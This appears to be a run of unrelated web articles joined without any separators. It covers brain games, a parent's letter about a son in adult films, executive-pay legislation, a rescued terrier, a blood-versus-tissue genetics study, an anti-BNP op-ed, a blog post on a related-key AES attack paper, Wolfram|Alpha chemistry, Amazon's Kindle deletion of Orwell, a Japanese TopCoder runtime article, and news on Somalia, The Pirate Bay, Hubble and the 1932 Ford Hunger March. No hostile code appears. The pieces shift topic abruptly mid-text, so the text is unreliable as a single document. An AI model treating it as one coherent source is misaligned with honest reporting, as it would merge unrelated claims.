Yet , no matter the particular type of brain activity each game is designed for , in order to succeed all brain games should comply with the very first rule of every gaming experience : being very fun .
The following are 7 creative and highly original casual games that go beyond mere testing hand - eye- coordination , and are guaranteed to sharpen your mind while kicking your brain into high gear .
The list was compiled by the puzzle lovers at Smartkit .
Sprout
This short but endearing puzzle adventure by Jeff Nusz of custom - logic.com features a tiny seed pod that must work its way across beautiful hand drawn landscapes .
Since there are no instructions , your clever brain will have to figure it out as you go along .
Play Sprout ( Smart- kit.com )
Splitter
Slice and dice the wooden blocks to get the smiley sphere rolling to its target in this great physics puzzle game by Eugene Karataev and Artem Popov .
Things start off easy , but gradually get harder as you progress .
Once you begin , however , you ’re going to have a hard time putting that GINSU thingy down - Splitter is highly addicting .
Play Splitter ( King.com )
Factory Balls
Drag and drop balls over the tools to produce the required ball physics as you advance through 14 levels .
Not very hard , yet still a highly engaging puzzle game with a great soundtrack by Bart Bonte , Belgium .
Play Factory Balls ( Scarlet.be )
Pickies
How many Pickies can you build ?
This brain game mainly exercises & tests executive cognitive function and processing speed .
Any score above 2000 puts you in the gifted range ; however , some may know a few rare Uber brains that can get to the 5000 mark .
Play Pickies ( Smart- kit.com )
Blocks with Letters On
Fiendish but fun anagram puzzle game .
Move the letter blocks into the yellow area to form an English word .
Created by Martine Sears from martgallery.co.uk .
Beginning levels are fairly easy while later levels can be extremely challenging .
Play Blocks with Letters On ( Gimme5games.com )
Perfect Balance
Keys ‘ A ’ and ‘ D’ rotate the shapes you must stack .
Use your ingenuity to position them so that they achieve ‘ perfect balance ’ and do n’t tumble over .
This is a classic game from which many clones have spawned .
Created by ttursas Ltd. , out of Helsinki , Finland .
Play Perfect Balance ( Armorgames.com )
River Crossing Puzzle
Supposedly used as part of an IQ test , the graphics in this Japanese game are well done , and the little animations are kind of amusing .
No worries about it being in Japanese though - just click on the characters to move them on / off raft and the red control ball to send the raft across the river .
Make sure to read and follow the 5 rules first :
1 . The raft can carry only 2 people .
2 . The father can not be left with any of the daughters unless the mother is present .
3 . The mother can not be left with any of the sons unless the father is present .
4 . The criminal can not stay with any family member unless the guard is present .
5 . Only the father , mother , and guard know how to use the raft .
A couple of answer submissions are already in the ' comment ' section here ; try solving it first before giving in and looking .
Play River Crossing Puzzle ( Siol.net )
About Smartkit
Smartkit features captivating daily puzzles to cross train all areas of your brain .
The site is visited by teachers and students of all ages looking for good educational fun to sharpen their minds .
In addition to brain games , Smartkit also features some of the best free online daily jigsaw puzzles .
Like and share
My 23 year old son " Harold " is a gay pornstar , however me and my wife have been assured by him that he is only " gay for pay " and is completely heterosexual .
For one thing he is NEVER a bottom always uses a condom and only receives oral sex .
While we naturally had misgivings about his line of work , he makes high six figures and seems to be happy with his life .
He has been in several serious relationships with female adult stars and we have been hoping that he would be making a crossover into hetero adult acting and even settling down and starting a family .
While we never watch his films we try to keep up with his career and have been very concerned by reports from several adult film industry gossip sites that he is in a serious relationship with another gay film star .
Several of the blogs had pictures of him making out with this man and apparently they are inseparable .
We are very disappointed that he has n't revealed this relationship to us and we are concerned he might be a real homosexual .
He is our only son and we have been looking forward to grandchildren and him leaving the industry and settling down with a nice woman , we want a son we can be proud of .
Should we confront him about this ?
The shareholder votes would not be binding on company management .
The measure tries to reduce the potential conflicts of interest involving compensation consultants who play a central role in blessing pay packages .
Many of those consultants also provide other services to the companies , putting them in a conflicting role for issuing fairness opinions about pay .
Image Representative Barney Frank , right , the Democratic chairman of the House Financial Services Committee , and Representative Spencer T. Bachus III , the ranking Republican member .
Credit ... Pablo Martinez Monsivais / Associated Press
The measure also gives regulators the authority to prohibit inappropriate or risky compensation practices for banks and other regulated financial institutions .
The Senate is not expected to consider the legislation until this fall , at the earliest .
The Obama administration ’s executive pay proposal , embodied in legislation sponsored by Representative Barney Frank , Democrat of Massachusetts , is part of its larger package of regulatory changes intended to reduce the chances of another economic crisis .
While the measure still faces political obstacles in the Senate , it has not encountered as much resistance as two other cornerstones of the administration ’s proposal  a greater role for the Federal Reserve in monitoring large institutions that could pose risks to the financial system and the creation of a new agency to protect consumers from deceptive or ill - suited mortgages , credit cards and other kinds of loans .
The legislation comes as the Obama administration is separately examining the pay practices of seven big companies that have received significant taxpayer assistance in recent months .
The administration ’s top official for compensation , Kenneth R. Feinberg , has been in discussions with the companies as he considers whether to approve the compensation of top executives at American International Group , Citigroup , Bank of America , General Motors , Chrysler and the financing arms of those two automakers .
HAVERFORDWEST , Wales , May 27 ( UPI ) -- A Jack Russell terrier who got stuck down a rabbit hole in Wales was able to free himself after 25 days without food .
Jill Thomas of Haverfordwest in Pembrokeshire told The Daily Mail that she and her husband Rick had given up on finding Jake the terrier after three weeks of putting up fliers and advertising in the newspaper and on a radio station .
Then they got a call from a farmer whose children had found the dog near where he disappeared while out on a walk with Rick Thomas .
Advertisement
" It was a joyous moment -- until we saw him , " she said .
" He was in a terrible state . "
The veterinarian warned them that Jake might not pull through .
But he put the starving dog on drip feeding , and he is on the road to recovery .
The vet told them that Jake probably got stuck in a rabbit warren until he became so thin he was able to get free .
" He was skin and bone and it was touch and go for a while , " Jill Thomas said .
" But he 's a fit little dog and he slowly recovered . "
Research by a group of Montreal scientists calls into question one of the most basic assumptions of human genetics : that when it comes to DNA , every cell in the body is essentially identical to every other cell .
Their results appear in the July issue of the journal Human Mutation .
This discovery may undercut the rationale behind numerous large - scale genetic studies conducted over the last 15 years , studies which were supposed to isolate the causes of scores of human diseases .
Except for cancer , samples of diseased tissue are difficult or even impossible to take from living patients .
Thus , the vast majority of genetic samples used in large - scale studies come in the form of blood .
However , if it turns out that blood and tissue cells do not match genetically , these ambitious and expensive genome - wide association studies may prove to have been essentially flawed from the outset .
This discovery sprang from an investigation into the underlying genetic causes of abdominal aortic aneurysms ( AAA ) led by Dr. Morris Schweitzer , Dr. Bruce Gottlieb , Dr. Lorraine Chalifour and colleagues at McGill University and the affiliated Lady Davis Institute for Medical Research at Montreal 's Jewish General Hospital .
The researchers focused on BAK , a gene that controls cell death .
What they found surprised them .
AAA is one of the rare vascular diseases where tissue samples are removed as part of patient therapy .
When they compared them , the researchers discovered major differences between BAK genes in blood cells and tissue cells coming from the same individuals , with the suspected disease " trigger " residing only in the tissue .
Moreover , the same differences were later evident in samples derived from healthy individuals .
advertisement
" In multi- factorial diseases other than cancer , usually we can only look at the blood , " explained Gottlieb , a geneticist with McGill 's Centre for Translational Research in Cancer .
" Traditionally when we have looked for genetic risk factors for , say , heart disease , we have assumed that the blood will tell us what 's happening in the tissue .
It now seems this is simply not the case . "
" From a genetic perspective , therapeutic implications aside , the observation that not all cells are the same is extremely important .
That 's the bottom line , " he added .
" Genome - wide association studies were introduced with enormous hype several years ago , and people expected tremendous breakthroughs .
They were going to draw blood samples from thousands or hundreds of thousands of individuals , and find the genes responsible for disease .
" Unfortunately , the reality of these studies has been very disappointing , and our discovery certainly could explain at least one of the reasons why . "
AAA is a localized widening and weakening of the abdominal aorta , and primarily affects elderly Caucasian men who smoke , have high blood pressure and high cholesterol levels .
It often has no symptoms , but can lead to aortic ruptures which are fatal in 90 per cent of cases .
If the mutations discovered in the tissue cells actually predispose for AAA , they present an ideal target for new therapies , and may have even wider therapeutic implications .
" This will probably have repercussions for vascular disease in general , " said Schweitzer , of McGill 's Department of Medicine .
" We have not yet looked at coronary or cerebral arteries , but I would suspect that this mutation may be present across the board . "
Schweitzer is optimistic that this discovery may lead to new treatments for vascular disease in the near to medium term .
" The timeline might be five to 10 years , " he said .
" We have to do in - vitro cell culture experiments first , prove it in an animal model , and then develop a molecule or protein which will affect the mutated gene product .
This is the first step , but it's an important step . "
I was born in the 70s and grew up in a tiny rural village .
There was , I think , only one black kid in my primary school .
One day , someone pushed him over and called him " blackjack " .
The headmaster called an impromptu assembly .
It involved the entire school , and took place outdoors .
No doubt : this was unusual .
We stood in military rows in the playground .
I must have been about six , so I can't remember the words he used , but the substance stuck .
He spoke with eerie , measured anger .
He 'd fought in the second world war , he told us .
Our village had a memorial commemorating friends of his who had died .
Many were relatives of ours .
These villagers gave their lives fighting a regime that looked down on anyone " different " , that tried to blame others for any problem they could find ; a bullying , racist regime called " the Nazis " .
Millions of people had died thanks to their bigotry and prejudice .
And he told us that anyone who picked on anyone else because they were " different ' was n't merely insulting the object of their derision , but insulting the headmaster himself , and his dead friends , and our dead relatives , the ones on the war memorial .
And if he heard of anyone - anyone - using racist language again , they 'd immediately get the slipper .
Corporal punishment was still alive and well , see .
The slipper was his nuclear bomb .
It was the first time I was explicitly told that racism was unpleasant and it was a lesson served with a side order of patriot fries .
Or rather , chips .
Our headmaster had fought for his country , and for tolerance , all at once .
That 's what I understood it meant to be truly " British " : to be polite , and civil and fair of mind .
( And to occasionally wallop schoolkids with slippers , admittedly , but we 'll overlook that , OK ?
We 've moved on . )
But according to the BNP , I 'm wrong .
Being British is actually about feeling aggressed , mistrustful , overlooked , isolated , powerless , and petrified of " losing my identity " .
Britishness incorporates a propensity to look around me with jealous eyes , fuming over imaginary sums of money being doled out to child - molesting asylum - seekers by corrupt PC politicians who 've lost touch with the common man - a common man who , coincidentally , happens to be white .
They 're wrong , obviously .
None of these qualities has anything whatsoever to do with being British , but everything to do with ugly nationalist politics .
And ugly nationalist politics are popular all over the world .
Just like Pringles .
Every country has its own tiny enclave of frightened , disenfranchised , misguided souls clinging to their national flag , claiming they 're the REAL patriots , saying everyone 's out to get them .
It 's an international weakness .
For the BNP to claim to be more British than the other British parties is as nonsensical as your dad suddenly claiming to have invented the beard .
The other day , the BNP had a political broadcast on the box .
I was n't in my beloved homeland at the time , but I heard about it , via internet chuckles of derision .
Fellow geeky types tweeting about the poor production values .
I looked it up on YouTube .
Sure enough , it was badly made .
No surprise there .
Extremist material of any kind always looks gaudy and cheap , like a bad pizza menu .
Not because they can't afford decent computers - these days you can knock up a professional CD cover on a pay - as - you - go mobile - but because anyone who 's good at graphic design is likely to be a thoughtful , inquisitive sort by nature .
And thoughtful , inquisitive sorts tend to think fascism is a bit shit , to be honest .
If the BNP really were the greatest British party , they'd have the greatest British designer working for them - Jonathan Ive , perhaps , the man who designed the iPod .
But they do n't .
They 've got someone who tries to stab your eyes out with primary colours .
But there 's more to the advert 's failure than its hideous use of colour schemes .
Every aspect of it is bad .
The framing is bad .
The sound is bad .
The script is bad .
For all their talk about representing the Great British Worker , when it comes to promotional material , the BNP can't even represent the most basic British craftsmanship .
Nick Griffin 's first line is " Do n't turn it off ! " , which in terms of opening gambits is about as enticing as hearing someone shout " Try not to be sick ! " immediately prior to intercourse .
He goes on to claim that , " We 're all angry about professional politicians with their snouts in the public trough . "
He 's right , we are : so angry we 're prepared to instantly forget all the occasions we 've fiddled our own expenses , thereby enabling us to add a dash of undeserved self - righteousness to our existing justified anger .
But by referring to " professional politicians " , Griffin is presumably suggesting we should elect amateurs instead .
Maybe that 's why the advert 's so amateurish .
Maybe that 's why all the BNP representatives in the ad read their lines so clumsily , like DFS employees in a bank holiday sale commercial circa 1986 , or recently revived chemical coma patients being forced to recite barcode numbers at gunpoint .
It 's deliberate incompetence .
Do n't vote for those nasty slick parties .
Vote for a shoddy one !
Never mind the extremism , feel the ineptitude .
Here 's a fantasy .
We - the decent British majority - spend years toiling in secret , creating a life - size replica of Britain in the middle of the Pacific .
It 's identical down to the tiniest blade of grass , or branch of Gregg's .
And one night , while every member of the BNP is asleep , we whisk them via helicopter to this replica UK , this Backup Britain .
Put them in replica beds in replica homes .
Then we fly back home to watch the fun on CCTV .
For several weeks , they walk around , confused , but pleased .
The weather 's nice !
More importantly , there are no black faces !
Then the infrastructure breaks down and they start to starve , and there 's no one to blame but themselves .
And then someone with GPS on their phone works out what 's happened , realises they 've all become immigrants in their own land .
Half of them go mad and start attacking each other .
The rest desperately apply for asylum in Britain .
The real Britain .
The decent , tolerant Britain .
The country you can be proud of .
Another New AES Attack
A new and very impressive attack against AES has just been announced .
Over the past couple of months , there have been two ( the second blogged about here ) new cryptanalysis papers on AES .
The attacks presented in the papers are not practical — they ’re far too complex , they ’re related - key attacks , and they ’re against larger - key versions and not the 128 - bit version that most implementations use — but they are impressive pieces of work all the same .
This new attack , by Alex Biryukov , Orr Dunkelman , Nathan Keller , Dmitry Khovratovich , and Adi Shamir , is much more devastating .
It is a completely practical attack against ten- round AES - 256 :
Abstract .
AES is the best known and most widely used block cipher .
Its three versions ( AES - 128 , AES - 192 , and AES - 256 ) differ in their key sizes ( 128 bits , 192 bits and 256 bits ) and in their number of rounds ( 10 , 12 , and 14 , respectively ) .
In the case of AES - 128 , there is no known attack which is faster than the 2128 complexity of exhaustive search .
However , AES - 192 and AES - 256 were recently shown to be breakable by attacks which require 2176 and 2119 time , respectively .
While these complexities are much faster than exhaustive search , they are completely non-practical , and do not seem to pose any real threat to the security of AES - based systems .
In this paper we describe several attacks which can break with practical complexity variants of AES - 256 whose number of rounds are comparable to that of AES - 128 .
One of our attacks uses only two related keys and 239 time to recover the complete 256 - bit key of a 9 - round version of AES - 256 ( the best previous attack on this variant required 4 related keys and 2120 time ) .
Another attack can break a 10 round version of AES - 256 in 245 time , but it uses a stronger type of related subkey attack ( the best previous attack on this variant required 64 related keys and 2172 time ) .
They also describe an attack against 11 - round AES - 256 that requires 270 time — almost practical .
These new results greatly improve on the Biryukov , Khovratovich , and Nikolic papers mentioned above , and a paper I wrote with six others in 2000 , where we describe a related - key attack against 9 - round AES - 256 ( then called Rijndael ) in 2224 time .
( This again proves the cryptographer ’s adage : attacks always get better , they never get worse . )
By any definition of the term , this is a huge result .
There are three reasons not to panic :
The attack exploits the fact that the key schedule for 256 - bit version is pretty lousy — something we pointed out in our 2000 paper — but does n’t extend to AES with a 128 - bit key .
It ’s a related - key attack , which requires the cryptanalyst to have access to plaintexts encrypted with multiple keys that are related in a specific way .
The attack only breaks 11 rounds of AES - 256 .
Full AES - 256 has 14 rounds .
Not much comfort there , I agree .
But it ’s what we have .
Cryptography is all about safety margins .
If you can break n round of a cipher , you design it with 2n or 3n rounds .
What we ’re learning is that the safety margin of AES is much less than previously believed .
And while there is no reason to scrap AES in favor of another algorithm , NST should increase the number of rounds of all three AES variants .
At this point , I suggest AES - 128 at 16 rounds , AES - 192 at 20 rounds , and AES - 256 at 28 rounds .
Or maybe even more ; we do n’t want to be revising the standard again and again .
And for new applications I suggest that people do n’t use AES - 256 .
AES - 128 provides more than enough security margin for the forseeable future .
But if you ’re already using AES - 256 , there ’s no reason to change .
The paper I have is still a draft .
It is being circulated among cryptographers , and should be online in a couple of days .
I will post the link as soon as I have it .
UPDATED TO ADD ( 8/3 ) : The paper is public .
Posted on July 30 , 2009 at 9:26 AM • 144 Comments
This week the American Chemical Society ( ACS ) is holding its Fall 2009 National Meeting & Exposition in Washington , DC , USA .
In honor of professional chemists , educators , and students , we ’re celebrating chemistry this week .
If you are attending the meeting and would like a personal introduction to Wolfram| Alpha or the technology behind it , drop by the Wolfram Research booth , # 2101 .
Wolfram|Alpha contains a wealth of chemistry data , and provides you rapid computations that ensure accuracy and save time .
Wolfram|
Alpha is also an incredible learning tool , especially for new chemistry students looking for ways to learn , understand , compare , and test their knowledge of chemistry basics .
Many of the topic areas found on an introductory or advanced course syllabus can be explored in Wolfram| Alpha .
Need to compute how many moles are in 5 grams of iron ?
Query “ how many moles are in 5 grams of iron ? ” , and Wolfram|Alpha quickly computes your input and returns a result , along with unit conversions .
Need some quick facts about carbon ?
With a quick query , Wolfram| Alpha returns its periodic table location , thermodynamic and material properties , and much more .
Here is an example of how you can save time by converting properties in Wolfram| Alpha :
With Wolfram|Alpha you can explore additional areas of basic chemistry such as computing a unit conversion , referencing chemical elements , ions , chemical compounds , thermodynamics , quantities of chemicals , and chemical solutions .
In Wednesday ’s blog post we will break down chemistry topic areas and explore how Wolfram| Alpha can help you work through specific exercises , such as identifying and comparing classes of chemical elements , calculating thermodynamics , preparing solutions , converting units , and stoichiometry .
Are you a professional who is using Wolfram| Alpha in your research today ?
Are you an instructor who has incorporated Wolfram| Alpha into your classroom , or a student who is using it to prepare for your chemistry courses ?
Share your experiences with other chemistry enthusiasts having this conversation on the Wolfram|Alpha Community site .
Late last week , hundreds of Kindle owners picked up their e-book readers and discovered two of the books they 'd purchased were missing .
Was it a software glitch or a hardware failure ?
Had some hacker broken into the Kindle store and figured out how to access the devices ?
Nope .
The thief was Amazon itself .
The store 's digital rights management apparatus had reached into the homely little gadgets via their always - available Sprint Whispernet connections and erased the books .
Apparently the publisher who sold the books did not have the rights to them .
So Amazon " unsold " them .
Here 's the best part :
The books that got flushed down the memory hole were none other than George Orwell 's " Animal Farm " and " 1984 . "
Oops .
[ Last month , Amazon opened up the Kindle 's source code .
| Stay up to date on Robert X. Cringely 's musings and observations with InfoWorld 's Notes from the Underground newsletter . ]
If Amazon 's intent was to demonstrate the Orwellian evil that is digital rights management , it could n't have picked a better way to do it .
( And talk about a gift to the world 's headline writers . )
Shortly after this amazing display of cluelessness , Amazon got its irony detection system back online and announced that a ) it was refunding the cost of the books ( a whopping 99 cents apiece ) to Kindle owners who mistakenly thought they owned the books they just bought ; and b ) it would n't pull this stunt again .
Or , at least , not in exactly the same way .
Lastly , the company apologized deeply for being total jerks .
I 'm just kidding about that last bit .
Amazon apologize ?
Do n't be ridiculous .
It gets worse .
In yanking the books out of its customers ' e-libraries , Amazon appears to have broken the Kindle 's own terms of service .
Per the New York Times ' Brad Stone :
Amazon 's published terms of service agreement for the Kindle does not appear to give the company the right to delete purchases after they have been made .
It says Amazon grants customers the right to keep a " permanent copy of the applicable digital content . "
Retailers of physical goods cannot , of course , force their way into a customer 's home to take back a purchase , no matter how bootlegged it turns out to be .
Yet Amazon appears to maintain a unique tether to the digital content it sells for the Kindle .
The problem with digital rights is that you and I do n't have any .
Paying customers are entirely at the mercy of the content providers and / or their delivery mechanisms .
If Amazon decides the book you just paid for is n't " applicable digital content , " or Apple decides it does n't want you to run iTunes on the Palm Pre , you 're screwed .
Your choice ?
Take it or leave it ; pirate it or hack it .
A closely related problem has to do with creeping nature of copyrights , which are similar to DRM except they 're enforced by attorneys , not software .
Orwell published those books in 1945 and 1949 .
He died in 1950 .
But thanks to a friendly U.S. Congress that keeps extending the limits of copyright protection , American rights to those works do n't expire until 2044 .
That 's when it enters the public domain , joining Shakespeare , Dickens , and all the rest that can republished at will ( and are generally available in electronic form from Project Gutenberg ) .
That 's not the case in Russia , where Orwell 's works are already in the public domain .
So in this case , the folks who live in the country that inspired the totalitarian pigs in " Animal Farm " and Big Brother in " 1984 " have more rights than we do .
Yet more irony to toss onto the fire .
Yes , content publishers need a way to protect themselves against rampant piracy .
But we need a way to protect ourselves from content publishers .
I think Congress needs to enact a customer bill of rights .
Right No. 1 : We own what we 've paid for , regardless of the fine print inside some license agreement drawn up by a team of $ 500 - an - hour attorneys .
In other words , less digital rights management , more customer rights management .
What do you think ?
What digital rights do you want ?
Post your thoughts below or e-mail me : cringe@infoworld.com .
プログラムの実行時 間
業務としてプログラミングをされている方には釈迦に説法かもしれませんが、プログラムの実行に掛かる時間を把握しておくのは、プログラミングを行う上で基本的な注意点です。そしてこれは、TopCoderなどのコンテストでプログラムを組む際にもよく当てはまります。通常、こうしたことは感覚的に理解している方がほとんどだと思いますが、具体的にどれくらいのループを回すと何秒掛かる、といった基準を持っている人は少ないのではないでしょうか？
非常に基本的なことですが、プログラムの実行時間に関して再確認しておきたいと思います。
TopCoderの制限に関して
TopCoderでは、実行時間およびメモリ使用量の制限は以下のようになっています。
実行時間：1テストケースにつき2秒
メモリ使用量 ：64Mバイト
このうち、メモリ使用量は、最初はあまり気にする必要はないでしょう。TopCoderの環境ではint型が32ビット、つまり4バイトですので、例えば要素数が10,000,000（1千万）個のint型配列であれば約38Mバイトとなります。ここで、要素数が20,000,000個となると約76Mバイトとなるので、メモリ使用量の制限を超えてしまう、ということが理解できれば十分です。そもそもTopCoderではそこまでメモリを使うことはあまりないと思います。
問題は実行時間です。プログラムの実行時間に対して正確な認識を持つことができれば、ある方針を思いついた時に、制限時間に間に合うかどうかを判断できますし、Challenge Phase （Challenge Phaseについては前回の記事を参照ください）では、他人のソースコードが制限時間を超過しているかどうかを判断できるので、勝負を有利に進めることができます。実行時間に対する感覚はしっかりと養っておきたいところです。
ここで 、TopCoderのサーバ上での実行時間を計測するために、以下のようなソースコードを作成しました。
DateTime dt ; TimeSpan ts ; long a = 0 ; dt = DateTime .
Now ; for ( long i = 1 ; i <= 10000000 ; i++) ; Console .
WriteLine ( " Time : " + ( ts = DateTime .
Now - dt ) .TotalMilliseconds + " ms ( ループのみ ) " ) ; dt = DateTime .
Now ; for ( long i = 1 ; i <= 10000000 ; i++) a += i + 10000000 ; Console .
WriteLine ( " Time : " + ( ts = DateTime .
Now - dt ) .TotalMilliseconds + " ms ( 足し算 ) " ) ; dt = DateTime .
Now ; for ( long i = 1 ; i <= 10000000 ; i++) a += i - 10000000 ; Console .
WriteLine ( " Time : " + ( ts = DateTime .
Now - dt ) .TotalMilliseconds + " ms ( 引き算 ) " ) ; dt = DateTime .
Now ; for ( long i = 1 ; i <= 10000000 ; i++) a += i * i ; Console .
WriteLine ( " Time : " + ( ts = DateTime .
Now - dt ) .TotalMilliseconds + " ms ( 掛け算 ) " ) ; dt = DateTime .
Now ; for ( long i = 1 ; i <= 10000000 ; i++) a += 10000000 / i ; Console .
WriteLine ( " Time : " + ( ts = DateTime .
Now - dt ) .TotalMilliseconds + " ms ( 割り算 ) " ) ;
このソースコードは、それぞれ、ループのみ、足し算、引き算、掛け算、割り算の5種類の演算を10,000,000回行うループに対して、それぞれ実行時間を計測するだけのプログラムです。これをTopCoder上のサーバで動かすと、実行結果は次のようになりました。
Time ：15.625ms（ループのみ） Time：31.25ms（足し算） Time ：31.25ms（引き算） Time ：46.875ms（掛け算） Time：93.75ms（割り算）
このプログラムはC#で記述しました。C++を用いるともう少し早くなるかもしれませんが、大きな差にはならないと思います。今回はループの中身が非常にシンプルですが、実際のプログラムではもう少しループの中身が複雑になりますので、前記を踏まえた上で、
ループの最も内側の計算数が10,000,000（1千万）程度であれば、ほとんどのプログラムで問題なく間に合う
ループの最も内側の計算数が100,000,000（1億）程度になると、複雑な計算をしている場合はかなり注意する必要がある
くらいの認識を持っておくとよいでしょう。
計算量の 「 オーダー」とは？
こうした時間の計算は、計算量の「オーダー」と呼ばれ、O記法を用いて表現されます。例えばn回のループの内側にm回のループが入っている場合、O（n*m）と表記します。この場合、一番計算回数が多い個所の計算回数がn*m回である、という程度に理解してもらえれば結構です。計算量は次数の一番大きい項に大きな影響を受けます。n^5 + n^3のような多項式を例に挙げると、nが大きくなればなるほどn^5とn^3の差は大きくなり、おおよその計算量をつかむのであれば、n^5の部分のみを考えればよいことが分かります。つまり、この場合の計算量のオーダーは、O（n^5）と表現できます。このように、次数の一番大きい項をO記法で表現しておおよその計算量をつかむのが、計算量のオーダーであるといえます。
この計算をする際に、今回は単純な四則演算だけでしたが、ほかの関数を呼び出す場合や、特別なデータ構造に対して操作を行う時などは、その操作や関数の計算量を把握しておかないと計算がズレてしまいます。例えば、n個の配列をソートしようとすると、O（n*logn）程度の計算量となりますし、n個要素を含んだリスト構造から真ん中の要素を取り出したい、といった時は、O（n）掛かってしまいます（厳密にはn/2回ですが、計算量を計算する際には、定数倍の係数は基本的に無視して表記します）。
計算量というのはなじみのない方には分かりにくい概念かもしれませんが、オーダーについては今後の連載でも登場しますので、少しずつ覚えていけばよいでしょう。
それでは問題に移りましょう。今回はSRM443 Mediumの問題に取り組んでみます。
1|2|3 次のページへ
Copyright © ITmedia , Inc. All Rights Reserved .
Somalia 's Islamists are accused of links to al - Qaeda
Two French security advisers seized in Somalia will be tried under Sharia law , an official from their captors , the Islamist al - Shabab militia , says .
A spokesman said they would be tried for spying and " conspiracy against Islam " , which could mean a death penalty .
However , correspondents say al - Shabab is divided , with some officials wanting a ransom payment rather than a trial .
The two , who were training government troops , were kidnapped in Mogadishu last week and then handed to al - Shabab .
Al - Shabab and its allies control much of southern Somalia .
The al - Shabab official said no date had been set for the trial of the two men .
They were on an official mission to train the forces of the interim government , which has recently appealed for foreign help to tackle Islamist insurgents .
Moderate Islamist President Sheikh Sharif Sheikh Ahmed was sworn in in January after UN - brokered peace talks .
He promised to introduce Sharia law but the hardliners accuse him of being a western stooge .
Somalia has not had a functioning national government since 1991 .
Peter Sunde , one of the four co-founders of The Pirate Bay , said Monday he is abandoning ship .
Sunde , the BitTorrent tracker 's spokesman , and his fellow colleagues each are facing a year in prison following their spring convictions for facilitating copyright infringement .
They remain free pending the outcome of an appeal of their Stockholm convictions .
The departure of Sunde , known online as " brokep , " perhaps is the strongest indication to date that the proposed $ 7.7 million sale of The Pirate Bay to a Swedish software concern is to be completed within weeks as planned .
Global Gaming Factory , its buyer , claims the 5 - year - old Pirate Bay will become a legitimate , pay - to - play site for media such as movies , software , music and games .
The goal , however lofty it sounds , is to convert the site 's 20 million pirates into fee - paying consumers .
" Today marks the end of a small era for me , but I am simply leaving a role in order to be a person instead , " Sunde said .
He said , " a book is waiting to be finalized and many more books are waiting to be read . "
If he loses his appeal , he 'll have plenty of time to write that book .
See Also :
Learn
Learn about the latest trends and how to get the most out of your business software .
Dark disturbance :
The WFC - 3 has not yet been properly calibrated
Hubble has trained its new camera on the atmospheric disturbance on Jupiter believed to have been caused by a comet or asteroid impact .
The telescope used the Wide Field Camera 3 fitted on the recent shuttle servicing mission to capture ultra - sharp visible - light images of the scar .
The dark spot near the gas giant 's southern pole was noticed first by an amateur Australian astronomer .
Some of the world 's biggest telescopes have since taken detailed pictures .
Engineers at the US space agency , Nasa , interrupted the post - servicing commissioning of the refurbished Hubble to use the WFC - 3 .
" Because we believe this magnitude of impact is rare , we are very fortunate to see it with Hubble , " said Amy Simon - Miller of Nasa 's Goddard Space Flight Center in Greenbelt , Maryland .
" Details seen in the Hubble view show a lumpiness to the debris plume caused by turbulence in Jupiter 's atmosphere . "
The pictures augur well for Hubble .
Its servicing should give it several more years of life .
The WFC - 3 will be used to take the deepest images of the cosmos yet .
Astronomers cannot be absolutely sure Jupiter was struck by a space object , but the evidence seems compelling .
The scar emerged on 19 July .
One estimate of the diameter of the impacting body suggests it may have been hundreds of metres wide .
" This is just one example of what Hubble 's new , state - of - the - art camera can do , thanks to the [ shuttle ] astronauts and the entire Hubble team , " said Ed Weiler , Nasa 's chief scientist .
" However , the best is yet to come . "
It is 15 years since Jupiter was famously hit by Comet Shoemaker - Levy 9 .
It broke up into several pieces as it plunged on to the gas giant .
There was prior warning of that event and Hubble took some typically remarkable pictures on that occasion , too .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
77th anniversary
The Ford Hunger March of 1932
Published Mar 25 , 2009 3:45 PM
March 7 was the 77th anniversary of one of the bloodiest chapters in Detroit labor history : the Ford Hunger March of 1932 .
The stock market crashed in October of 1929 .
By 1930 millions were without work .
Nowhere was the pain felt more deeply than in Detroit , where the auto industry ’s promise of prosperity had turned into its opposite .
When the Trade Union Unity League , the Communist Party , the Young Communist League and the newly formed Unemployed Councils called a coast - to - coast demonstration on March 6 , among the millions of participants were 100,000 at a rally in the Motor City .
Detroit police broke up the protest , clubbing and arresting scores of participants .
Two years later the crisis had deepened ; one statistic showed four Detroiters dying of hunger every day .
Unemployment compensation did not exist .
With two - thirds of his employees laid off , Henry Ford , then the richest man in the world , said the unemployed created their own misery by not working hard enough .
Detroit ’s network of Unemployed Councils had grown into one of the strongest in the country , saving untold numbers of families from a life on the streets .
A citywide meeting of the councils — there were more than 80 neighborhood - based chapters in metropolitan Detroit — decided to march on the Ford Motor Co. ’s River Rouge complex in Dearborn , Mich .
The march , called by the Unemployed Councils and the United Auto Workers , had 14 demands : “ Jobs for all laid off Ford workers ; immediate payment of 50 per cent of full wages ; seven - hour day without reduction in pay ; slowing down of deadly speedup ; two fifteen - minute rest periods ;
No discrimination against Negroes in jobs ; relief [ welfare ] , medical service ; free medical aid in Ford hospital for employed and unemployed Ford workers and families ; five tons of coal and coke for the winter ; abolition of Service Men [ Ford ’s hated private army of spies and thugs , led by the notorious Harry Bennett ] ; no foreclosures on homes of Ford workers ; immediate payment of lump sum of fifty dollars for winter relief ; full wages for part time workers ; abolition of the graft system of hiring ; and the right to organize . ”
( Philip Bonosky , Brother Bill McKee : “ Building the Union at Ford ” )
The protest brought out thousands of workers .
Beyond the immediate 14 demands , signs connected issues affecting workers around the world .
They called for freedom for the Scottsboro Nine , a group of Black youths falsely accused of raping two white women .
They said “ hands off China , ” a reference to the sale of scrap iron to Japan , which used it in attacking the Chinese people .
The march began and proceeded without incident in Detroit .
Dearborn , however , was Ford ’s personal fiefdom ; his cousin Clyde Ford was the mayor .
Marchers were attacked with tear gas at the city ’s border , but forced police to retreat with a barrage of stones and clumps of frozen mud .
Police regrouped , only to have the scenario repeated .
At the entrance to Ford ’s complex , Dearborn police were reinforced by the Dearborn Fire Department , Detroit police , and Ford ’s own “ Service Department . ”
The firefighters turned their hoses on the unarmed marchers , while police fired a hail of bullets .
Coleman ( also spelled Kalman ) Leny , Joe DiBlasio , and Joe York — the 19 - year - old district leader of the YCL — were killed .
Fifty more were wounded .
When Unemployed Council leader Alfred Goetz attempted to lead an orderly retreat , machine - gun fire , this time from Ford ’s own finest , began anew .
The auto magnate ’s right - hand man , Harry Bennett , was immediately recognized and injured by stone - throwing workers .
Bennett emptied his own gun and then a police officer ’s revolver into the workers .
He and his goons killed 16 - year - old YCL member Joe Bussell and left many more injured .
Forty - eight workers , some in their hospital beds , were arrested .
More repression followed , with hundreds fired if they possessed left - wing literature or donated to the martyrs ’ funerals .
Membership in the CP was cause for arrest .
At the funeral , Ben Bussell spoke loudly : “ In the name of my murdered brother , I call upon you to organize and fight .
Long live the workers of the world . ”
